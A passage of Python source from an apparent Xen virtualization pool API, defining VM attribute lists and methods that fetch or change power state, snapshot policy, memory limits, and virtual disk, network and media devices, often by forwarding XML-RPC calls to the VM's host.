VM_attr_ro = ['power_state',
'resident_on',
'consoles',
'snapshots',
'VIFs',
'VBDs',
'VTPMs',
'DPCIs',
'DSCSIs',
'media',
'fibers',
'usb_scsi',
'DSCSI_HBAs',
'tools_version',
'domid',
'is_control_domain',
'metrics',
'crash_dumps',
'cpu_pool',
'cpu_qos',
'network_qos',
'VCPUs_CPU',
'ip_addr',
'MAC',
'is_local_vm',
'vnc_location',
'available_vbd_device',
'VIF_record',
'VBD_record',
'dev2path_list',
'pid2devnum_list',
'vbd2device_list',
'config',
'record_lite',
'inner_ip',
'system_VDI',
'network_record',
]
VM_attr_rw = ['name_label',
'name_description',
'user_version',
'is_a_template',
'auto_power_on',
'snapshot_policy',
'memory_dynamic_max',
'memory_dynamic_min',
'memory_static_max',
'memory_static_min',
'VCPUs_max',
'VCPUs_at_startup',
'VCPUs_params',
'actions_after_shutdown',
'actions_after_reboot',
'actions_after_suspend',
'actions_after_crash',
'PV_bootloader',
'PV_kernel',
'PV_ramdisk',
'PV_args',
'PV_bootloader_args',
'HVM_boot_policy',
'HVM_boot_params',
'platform',
'PCI_bus',
'other_config',
'security_label',
'pool_name',
'suspend_VDI',
'suspend_SR',
'VCPUs_affinity',
'tags',
'tag',
'rate',
'all_tag',
'all_rate',
'boot_order',
'IO_rate_limit',
# 'ip_map',
'passwd',
'config',
'platform_serial',
]
VM_methods = [('clone', 'VM'),
('clone_local', 'VM'),
('clone_MAC', 'VM'),
('clone_local_MAC', 'VM'),
('start', None),
('start_on', None),
('snapshot', None),
('rollback', None),
('destroy_snapshot', 'Bool'),
('destroy_all_snapshots', 'Bool'),
('pause', None),
('unpause', None),
('clean_shutdown', None),
('clean_reboot', None),
('hard_shutdown', None),
('hard_reboot', None),
('suspend', None),
('resume', None),
('send_sysrq', None),
('set_VCPUs_number_live', None),
('add_to_HVM_boot_params', None),
('remove_from_HVM_boot_params', None),
('add_to_VCPUs_params', None),
('add_to_VCPUs_params_live', None),
('remove_from_VCPUs_params', None),
('add_to_platform', None),
('remove_from_platform', None),
('add_to_other_config', None),
('remove_from_other_config', None),
('save', None),
('set_memory_dynamic_max_live', None),
('set_memory_dynamic_min_live', None),
('send_trigger', None),
('pool_migrate', None),
('migrate', None),
('destroy', None),
('cpu_pool_migrate', None),
('destroy_local', None),
('destroy_fiber', None),
('destroy_usb_scsi', None),
('destroy_media', None),
('destroy_VIF', None),
('disable_media', None),
('enable_media', None),
('eject_media', None),
('copy_sxp_to_nfs', None),
('media_change', None),
('add_tags', None),
('check_fibers_valid', 'Map'),
('check_usb_scsi_valid', 'Map'),
('can_start','Bool'),
('init_pid2devnum_list', None),
('clear_IO_rate_limit', None),
('clear_pid2devnum_list', None),
('start_set_IO_limit', None),
('start_init_pid2dev', None),
('create_image', 'Bool'),
('send_request_via_serial', 'Bool'),
# ('del_ip_map', None),
]
VM_funcs = [('create', 'VM'),
('create_on', 'VM'),
('create_from_sxp', 'VM'),
('create_from_vmstruct', 'VM'),
('restore', None),
('get_by_name_label', 'Set(VM)'),
('get_all_and_consoles', 'Map'),
('get_lost_vm_by_label', 'Map'),
('get_lost_vm_by_date', 'Map'),
('get_record_lite', 'Set'),
('create_data_VBD', 'Bool'),
('delete_data_VBD', 'Bool'),
('create_from_template', None),
('create_on_from_template', None),
('clone_system_VDI', 'VDI'),
('create_with_VDI', None),
]
# parameters required for _create()
VM_attr_inst = [
'name_label',
'name_description',
'user_version',
'is_a_template',
'is_local_vm',
'memory_static_max',
'memory_dynamic_max',
'memory_dynamic_min',
'memory_static_min',
'VCPUs_max',
'VCPUs_at_startup',
'VCPUs_params',
'actions_after_shutdown',
'actions_after_reboot',
'actions_after_suspend',
'actions_after_crash',
'PV_bootloader',
'PV_kernel',
'PV_ramdisk',
'PV_args',
'PV_bootloader_args',
'HVM_boot_policy',
'HVM_boot_params',
'platform',
'PCI_bus',
'other_config',
'security_label']
def VM_get(self, name, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM attribute value by name.
@param name: name of VM attribute field.
@param session: session of RPC.
@param vm_ref: uuid of VM.
@return: value of field.
@rtype: dict
'''
return xen_api_success(
XendDomain.instance().get_vm_by_uuid(vm_ref).info[name])
def VM_set(self, name, session, vm_ref, value):
'''
@author: wuyuewen
@summary: Set VM attribute value by name.
@param name: name of VM attribute field.
@param session: session of RPC.
@param vm_ref: uuid of VM.
@param value: new value of VM attribute field.
@return: True | False.
@rtype: dict
'''
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
dominfo.info[name] = value
return self._VM_save(dominfo)
def _VM_save(self, dominfo):
'''
@author: wuyuewen
@summary: Call config save function, the struct of VM will save to disk.
@param dominfo: VM config structure.
@return: True | False.
@rtype: dict.
'''
log.debug('VM_save')
XendDomain.instance().managed_config_save(dominfo)
return xen_api_success_void()
# attributes (ro)
def VM_get_power_state(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM power state by uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@return: power state.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_power_state(vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_power_state", vm_ref)
else:
return self._VM_get_power_state(vm_ref)
def _VM_get_power_state(self, vm_ref):
'''
@author: wuyuewen
@summary: Internal method.
@param vm_ref: uuid.
@return: power state.
@rtype: dict.
'''
# log.debug("in get power state")
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_power_state())
# def VM_get_power_state(self, session, vm_ref):
# #host_ref = BNPoolAPI._VM_to_Host[vm_ref]
# host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
# if cmp(host_ref, XendNode.instance().uuid) == 0:
# dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
# return xen_api_success(dom.get_power_state())
# else:
# try:
# remote_ip = BNPoolAPI._host_structs[host_ref]['ip']
# proxy = ServerProxy('http://' + remote_ip + ':9363')
# response = proxy.session.login('root')
# if cmp(response['Status'], 'Failure') == 0:
# return xen_api_error(response['ErrorDescription'])
# session_ref = response['Value']
# return proxy.VM.get_power_state(session_ref, vm_ref)
# except socket.error:
# return xen_api_error('socket error')
def VM_get_resident_on(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM resident Host.
@param session: session of RPC.
@param vm_ref: uuid.
@return: Host uuid.
@rtype: dict.
'''
#host_ref = BNPoolAPI._VM_to_Host[vm_ref]
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
return xen_api_success(host_ref)
def VM_get_snapshots(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM snapshots by uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@return: snapshots.
@rtype: dict.
'''
vdi_ref = self.VM_get_system_VDI(session, vm_ref).get('Value')
log.debug('system vdi_ref: %s' % vdi_ref)
return self._VM_get_vdi_snapshots(session, vdi_ref)
def _VM_get_vdi_snapshots(self, session, vdi_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM snapshots by uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@return: snapshots.
@rtype: dict.
'''
storage = self._get_BNStorageAPI_instance()
vdi_rec = storage.VDI_get_record(session, vdi_ref).get('Value', '')
if not vdi_rec:
log.debug('VM_snapshot_vdi>>>>>vdi do not exist...')
return xen_api_success([])
sr = vdi_rec['SR']
log.debug("sr : %s>>>>>>>>>>" % sr)
sr_rec = storage._SR_get_record("", sr).get('Value')
if not sr_rec:
log.debug('sr record do not exist>>>>>')
return xen_api_success([])
sr_type = sr_rec.get('type')
log.debug('sr type>>>>>>>>>>>>>>>%s' % sr_type)
if cmp(sr_type, 'gpfs') == 0:
mount_point = sr_rec['mount_point']
log.debug('mount_point: %s' % mount_point)
proxy = ServerProxy("http://127.0.0.1:10010")
snapshots = proxy.get_snapshots_gpfs(mount_point, vdi_ref)
elif cmp(sr_type, 'mfs') == 0:
mount_point = sr_rec['mount_point']
log.debug('mount_point: %s' % mount_point)
proxy = ServerProxy("http://127.0.0.1:10010")
snapshots = proxy.get_snapshots_mfs(mount_point, vdi_ref)
elif cmp(sr_type, 'ocfs2') == 0:
mount_point = sr_rec['mount_point']
log.debug('mount_point: %s' % mount_point)
proxy = ServerProxy("http://127.0.0.1:10010")
snapshots = proxy.get_snapshots_ocfs2(mount_point, vdi_ref)
elif cmp(sr_type, 'local_ocfs2') == 0:
mount_point = sr_rec['mount_point']
log.debug('mount_point: %s' % mount_point)
proxy = ServerProxy("http://127.0.0.1:10010")
snapshots = proxy.get_snapshots_ocfs2(mount_point, vdi_ref)
else:
sr_ip = sr_rec['other_config']['location'].split(":")[0]
log.debug("sr ip : %s" % sr_ip)
proxy = ServerProxy("http://%s:10010" % sr_ip)
snapshots = proxy.get_snapshots(sr, vdi_ref)
log.debug("snapshots : %s " % snapshots)
return xen_api_success(snapshots)
def VM_get_snapshot_policy(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM snapshot policy by uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@return: snapshot policy.
@rtype: dict.
'''
vdi_ref = self.VM_get_system_VDI(session, vm_ref).get('Value')
log.debug('system vdi_ref: %s' % vdi_ref)
return self._VM_get_vdi_snapshot_policy(session, vdi_ref)
def _VM_get_vdi_snapshot_policy(self, session, vdi_ref):
'''
@author: wuyuewen
@summary: Interal method. Get VM snapshot policy by uuid.
@param session: session of RPC.
@param vdi_ref: VM system VDI's uuid.
@return: snapshot policy.
@rtype: dict.
'''
storage = self._get_BNStorageAPI_instance()
vdi_rec = storage.VDI_get_record(session, vdi_ref).get('Value', '')
if not vdi_rec:
log.debug('VM_snapshot_vdi>>>>>vdi do not exist...')
return xen_api_success(False)
sr = vdi_rec['SR']
log.debug("sr : %s>>>>>>>>>>" % sr)
sr_rec = storage._SR_get_record("", sr).get('Value', None)
if sr_rec:
location = sr_rec['other_config']['location']
sr_type = sr_rec.get('type')
if cmp(sr_type, 'gpfs') == 0 or cmp(sr_type, 'mfs') == 0\
or cmp(sr_type, 'ocfs2') == 0 or cmp(sr_type, 'local_ocfs2') == 0:
proxy = ServerProxy("http://127.0.0.1:10010")
snapshot_policy = proxy.get_snapshot_policy(sr, vdi_ref)
log.debug("snapshot_policy : %s " % snapshot_policy)
else:
sr_ip = location.split(":")[0]
log.debug("sr rec : %s" % sr_rec)
log.debug("sr ip : %s" % sr_ip)
proxy = ServerProxy("http://%s:10010" % sr_ip)
snapshot_policy = proxy.get_snapshot_policy(sr, vdi_ref)
log.debug("snapshot_policy : %s " % snapshot_policy)
return xen_api_success(snapshot_policy)
else:
return xen_api_success(("1", "100"))
def VM_set_snapshot_policy(self, session, vm_ref, interval, maxnum):
'''
@author: wuyuewen
@summary: Set VM snapshot policy by uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@param interval: the interval of create a snap, the unit is (day).
@param maxnum: the max number of snapshots keep.
@return: True | False.
@rtype: dict.
'''
vdi_ref = self.VM_get_system_VDI(session, vm_ref).get('Value')
return self._VM_set_vdi_snapshot_policy(session, vdi_ref, interval, maxnum)
    def _VM_set_vdi_snapshot_policy(self, session, vdi_ref, interval, maxnum):
        '''
        @author: wuyuewen
        @summary: Internal method. Set VM snapshot policy by uuid.
        @param session: session of RPC.
        @param vdi_ref: VM system VDI's uuid.
        @param interval: the interval of create a snap, the unit is (day).
        @param maxnum: the max number of snapshots keep.
        @return: True | False.
        @rtype: dict.
        '''
        storage = self._get_BNStorageAPI_instance()
        vdi_rec = storage.VDI_get_record(session, vdi_ref).get('Value', '')
        if not vdi_rec:
            log.debug('VM_snapshot_vdi>>>>>vdi do not exist...')
            # NOTE(review): this returns the default policy tuple rather
            # than False, contradicting the docstring; looks copied from
            # the getter — confirm intended behaviour before changing.
            return xen_api_success(("1", "100"))
        sr = vdi_rec['SR']
        log.debug("sr : %s>>>>>>>>>>" % sr)
        sr_rec = storage._SR_get_record("", sr).get('Value', None)
        if sr_rec:
            sr_type = sr_rec.get('type')
            # Cluster filesystems go through the local storage agent; other
            # SR types go to the agent on the SR's own host.
            if cmp(sr_type, 'gpfs') == 0 or cmp(sr_type, 'mfs') == 0\
                or cmp(sr_type, 'ocfs2') == 0 or cmp(sr_type, 'local_ocfs2') == 0:
                proxy = ServerProxy("http://127.0.0.1:10010")
                snapshot_policy = proxy.set_snapshot_policy(sr, vdi_ref, interval, maxnum)
                log.debug("snapshot_policy : %s " % snapshot_policy)
            else:
                sr_ip = sr_rec['other_config']['location'].split(":")[0]
                log.debug("sr rec : %s" % sr_rec)
                log.debug("sr ip : %s" % sr_ip)
                proxy = ServerProxy("http://%s:10010" % sr_ip)
                snapshot_policy = proxy.set_snapshot_policy(sr, vdi_ref, interval, maxnum)
                log.debug("snapshot_policy : %s " % snapshot_policy)
            return xen_api_success(snapshot_policy)
        else:
            # No SR record: report the default policy.
            return xen_api_success(("1", "100"))
def VM_get_memory_static_max(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM memory static max.
@param session: session of RPC.
@param vm_ref: uuid.
@return: memory static max.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_memory_static_max(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_get_memory_static_max', vm_ref)
else:
return self._VM_get_memory_static_max(session, vm_ref)
def _VM_get_memory_static_max(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM memory static max.
@param session: session of RPC.
@param vm_ref: uuid.
@return: memory static max.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_memory_static_max())
def VM_get_memory_static_min(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM memory static min.
@param session: session of RPC.
@param vm_ref: uuid.
@return: memory static min.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_memory_static_min(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_get_memory_static_min', vm_ref)
else:
return self._VM_get_memory_static_min(session, vm_ref)
    def _VM_get_memory_static_min(self, session, vm_ref):
        '''
        @author: wuyuewen
        @summary: Internal method. Get VM memory static min.
        @param session: session of RPC.
        @param vm_ref: uuid.
        @return: memory static min.
        @rtype: dict.
        '''
        dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
        return xen_api_success(dom.get_memory_static_min())
def VM_get_VIFs(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM VIFs.
@param session: session of RPC.
@param vm_ref: uuid.
@return: VIFs.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_VIFs(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_VIFs", vm_ref)
else:
return self._VM_get_VIFs(session, vm_ref)
def _VM_get_VIFs(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM VIFs.
@param session: session of RPC.
@param vm_ref: uuid.
@return: VIFs.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_vifs())
def VM_get_VBDs(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM VBDs.
@param session: session of RPC.
@param vm_ref: uuid.
@return: VBDs.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_VBDs(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_VBDs", vm_ref)
else:
return self._VM_get_VBDs(session, vm_ref)
def _VM_get_VBDs(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM VBDs.
@param session: session of RPC.
@param vm_ref: uuid.
@return: VBDs.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_vbds())
def VM_get_usb_scsi(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM usb scsi devices(VBD), the backend is /dev/XXX.
@param session: session of RPC.
@param vm_ref: uuid.
@return: VBDs.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_usb_scsi(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_usb_scsi", vm_ref)
else:
return self._VM_get_usb_scsi(session, vm_ref)
def _VM_get_usb_scsi(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM usb scsi devices(VBD), the backend is /dev/XXX.
@param session: session of RPC.
@param vm_ref: uuid.
@return: VBDs.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
vbds = dom.get_vbds()
result = []
for vbd in vbds:
vbd_type = self.VBD_get_type(session, vbd).get('Value', "")
if cmp(vbd_type, XEN_API_VBD_TYPE[3]) == 0:
#log.debug('fibers: %s' % vbd)
result.append(vbd)
return xen_api_success(result)
def VM_get_fibers(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM fiber devices(VBD), the backend is /dev/XXX.
@param session: session of RPC.
@param vm_ref: uuid.
@return: VBDs.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_fibers(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_fibers", vm_ref)
else:
return self._VM_get_fibers(session, vm_ref)
def _VM_get_fibers(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM fiber devices(VBD), the backend is /dev/XXX.
@param session: session of RPC.
@param vm_ref: uuid.
@return: VBDs.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
vbds = dom.get_vbds()
result = []
for vbd in vbds:
vbd_type = self.VBD_get_type(session, vbd).get('Value', "")
if cmp(vbd_type, XEN_API_VBD_TYPE[2]) == 0:
#log.debug('fibers: %s' % vbd)
result.append(vbd)
return xen_api_success(result)
def VM_destroy_usb_scsi(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Destroy VM usb scsi device(VBD) by vbd uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
@raise VDIError: Cannot destroy VDI with VBDs attached
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_destroy_usb_scsi(session, vm_ref, vbd_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_destroy_usb_scsi", vm_ref, vbd_ref)
else:
return self._VM_destroy_usb_scsi(session, vm_ref, vbd_ref)
def _VM_destroy_usb_scsi(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Internal method. Destroy VM usb scsi device(VBD) by vbd uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
@raise VDIError: Cannot destroy VDI with VBDs attached
'''
storage = self._get_BNStorageAPI_instance()
vdi_ref = self.VBD_get_VDI(session, vbd_ref).get('Value')
response = self.VBD_destroy(session, vbd_ref)
if vdi_ref:
storage.VDI_destroy(session, vdi_ref)
return response
def VM_destroy_fiber(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Destroy VM fiber device(VBD) by vbd uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
@raise VDIError: Cannot destroy VDI with VBDs attached
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_destroy_fiber(session, vbd_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_destroy_fiber", vm_ref, vbd_ref)
else:
return self._VM_destroy_fiber(session, vbd_ref)
def _VM_destroy_fiber(self, session, vbd_ref):
'''
@author: wuyuewen
@summary: Internal method. Destroy VM fiber device(VBD) by vbd uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
@raise VDIError: Cannot destroy VDI with VBDs attached
'''
storage = self._get_BNStorageAPI_instance()
vdi_ref = self.VBD_get_VDI(session, vbd_ref).get('Value')
response = self.VBD_destroy(session, vbd_ref)
if vdi_ref:
storage.VDI_destroy(session, vdi_ref)
return response
def VM_enable_media(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Enable VM's media device(cdrom device).
@precondition: VM not running
@param session: session of RPC.
@param vm_ref: uuid.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_enable_media(session, vbd_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_enable_media", vbd_ref)
else:
return self._VM_enable_media(session, vbd_ref)
def _VM_enable_media(self, session, vbd_ref):
'''
@author: wuyuewen
@summary: Internal method. Enable VM's media device(cdrom device).
@precondition: VM not running
@param session: session of RPC.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
'''
response = self.VBD_set_bootable(session, vbd_ref, 1)
return response
def VM_disable_media(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Disable VM's media device(cdrom device).
@precondition: VM not running
@param session: session of RPC.
@param vm_ref: uuid.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_disable_media(session, vbd_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_disable_media", vbd_ref)
else:
return self._VM_disable_media(session, vbd_ref)
def _VM_disable_media(self, session, vbd_ref):
'''
@author: wuyuewen
@summary: Internal method. Disable VM's media device(cdrom device).
@precondition: VM not running
@param session: session of RPC.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
'''
response = self.VBD_set_bootable(session, vbd_ref, 0)
return response
def VM_eject_media(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Eject VM's media device(cdrom device).
@param session: session of RPC.
@param vm_ref: uuid
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
@raise xen_api_error: HANDLE_INVALID
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_eject_media(session, vm_ref, vbd_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_eject_media", vm_ref, vbd_ref)
else:
return self._VM_eject_media(session, vm_ref, vbd_ref)
def _VM_eject_media(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Internal method. Eject VM's media device(cdrom device).
@param session: session of RPC.
@param vm_ref: uuid
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
@raise xen_api_error: HANDLE_INVALID
'''
node = XendNode.instance()
if not node.is_fake_media_exists():
self._fake_media_auto_create(session)
# if not os.path.exists(FAKE_MEDIA_PATH):
# os.system("touch %s" % FAKE_MEDIA_PATH)
response = self._VM_media_change(session, vm_ref, FAKE_MEDIA_NAME)
return response
def VM_destroy_media(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Destroy VM's media device(cdrom device).
@param session: session of RPC.
@param vm_ref: uuid
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
@raise xen_api_error: HANDLE_INVALID
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_destroy_media(session, vbd_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_destroy_media", vm_ref, vbd_ref)
else:
return self._VM_destroy_media(session, vbd_ref)
def _VM_destroy_media(self, session, vbd_ref):
'''
@author: wuyuewen
@summary: Destroy VM's media device(cdrom device).
@param session: session of RPC.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
@raise xen_api_error: HANDLE_INVALID
'''
response = self.VBD_destroy(session, vbd_ref)
return response
def VM_destroy_VIF(self, session, vm_ref, vif_ref):
'''
@author: wuyuewen
@summary: Destroy VM's VIF device(network device).
@param session: session of RPC.
@param vm_ref: uuid
@param vif_ref: VIF's uuid.
@return: True | False
@rtype: dict.
@raise xen_api_error: HANDLE_INVALID
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_destroy_VIF(session, vm_ref, vif_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_destroy_VIF", vm_ref, vif_ref)
else:
return self._VM_destroy_VIF(session, vm_ref, vif_ref)
def _VM_destroy_VIF(self, session, vm_ref, vif_ref):
'''
@author: wuyuewen
@summary: Internal method. Destroy VM's VIF device(network device).
@param session: session of RPC.
@param vm_ref: uuid
@param vif_ref: VIF's uuid.
@return: True | False
@rtype: dict.
@raise xen_api_error: HANDLE_INVALID
'''
# self._VM_del_ip_map(session, vm_ref, vif_ref)
response = self.VIF_destroy(session, vif_ref)
return response
def VM_get_available_vbd_device(self, session, vm_ref, device_type = 'xvd'):
'''
@author: wuyuewen
@summary: Use at pre-create of VBD device, return the device name(xvdX/hdX) that can use.
@precondition: The available interval is xvda-xvdj/hda-hdj, limit total 10 devices.
@param session: session of RPC.
@param vm_ref: uuid
@param device_type: xvd/hd.
@return: available device name.
@rtype: dict.
@raise xen_api_error: DEVICE_OUT_OF_RANGE, NO_VBD_ERROR
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_available_vbd_device(session, vm_ref, device_type)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_available_vbd_device", vm_ref, device_type)
else:
return self._VM_get_available_vbd_device(session, vm_ref, device_type)
    def _VM_get_available_vbd_device(self, session, vm_ref, device_type):
        '''
        @author: wuyuewen
        @summary: Internal method. Use at pre-create of VBD device, return the device name(xvdX/hdX) that can use.
        @precondition: The available interval is xvda-xvdj/hda-hdj, limit total 10 devices.
        @param session: session of RPC.
        @param vm_ref: uuid
        @param device_type: xvd/hd. NOTE(review): this parameter is currently
            unused; the name family is inferred from the VM's first VBD below.
        @return: available device name.
        @rtype: dict.
        @raise xen_api_error: DEVICE_OUT_OF_RANGE, NO_VBD_ERROR
        '''
        vbds = self._VM_get_VBDs(session, vm_ref).get('Value')
        if vbds:
            # Enforce the device cap before searching for a free name.
            if cmp(len(vbds), DISK_LIMIT+1) >= 0:
                return xen_api_error(['DEVICE_OUT_OF_RANGE', 'VBD'])
            # Pick the candidate pool (hdX vs xvdX) from the first VBD's name.
            vbds_first_device = self.VBD_get_device(session, vbds[0]).get('Value')
            if vbds_first_device.startswith('hd'):
                device_list = copy.deepcopy(VBD_DEFAULT_DEVICE)
            else:
                device_list = copy.deepcopy(VBD_XEN_DEFAULT_DEVICE)
            # Remove every name already taken by an existing VBD.
            for vbd in vbds:
                device = self.VBD_get_device(session, vbd).get('Value')
                if device and device in device_list:
                    device_list.remove(device)
                else:
                    continue
            # First remaining candidate is the answer; none left means full.
            if device_list:
                return xen_api_success(device_list[0])
            else:
                return xen_api_error(['DEVICE_OUT_OF_RANGE', 'VBD'])
        else:
            # A VM with no VBDs at all is treated as an error here.
            return xen_api_error(['NO_VBD_ERROR', 'VM', vm_ref])
def VM_get_media(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's media device(cdrom device).
@param session: session of RPC.
@param vm_ref: uuid
@return: VBD
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_media(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_media", vm_ref)
else:
return self._VM_get_media(session, vm_ref)
def _VM_get_media(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's media device(cdrom device).
@param session: session of RPC.
@param vm_ref: uuid
@return: VBD
@rtype: dict.
'''
storage = self._get_BNStorageAPI_instance()
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
vbds = dom.get_vbds()
result = None
for vbd in vbds:
vbd_type = self.VBD_get_type(session, vbd).get('Value', "<none/>")
if cmp(vbd_type, XEN_API_VBD_TYPE[0]) == 0:
